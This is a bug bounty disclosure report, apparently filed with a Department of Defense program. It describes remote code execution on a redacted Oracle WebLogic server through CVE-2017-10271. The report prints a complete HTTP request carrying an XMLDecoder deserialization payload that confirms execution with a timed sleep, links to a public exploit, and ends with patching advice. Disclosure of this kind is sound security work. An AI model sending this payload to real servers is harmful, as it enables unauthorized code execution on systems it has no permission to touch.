RCE on █████ via CVE-2017-10271
Discovered by erbbysam on Deptofdefense

This issue took 3 Days and 18 hours to triage and 22 Days and 0 hours to resolve once triaged.



Summary: Happy Friday! The server at ██████ is vulnerable to CVE-2017-10271 "Oracle WebLogic Server Remote Command Execution".

Description: The following request takes 12 seconds (12000 milliseconds) to complete:

POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1
Host: ██████████
Content-Length: 423
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java class="java.beans.XMLDecoder">
        <object class="java.lang.Thread" method="sleep">
          <long>12000</long>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

This proves that I have Java code execution on the remote server.

ref: https://techblog.mediaservice.net/2018/07/cve-2017-10271-oracle-weblogic-server-remote-command-execution-sleep-detection-payload/

Public exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271 I was not able to use that script with a ping command, which might have been blocked by preventing outbound connections.

Suggested Mitigation/Remediation Actions

Patch & possibly don't allow external access.

Impact

Critical, RCE.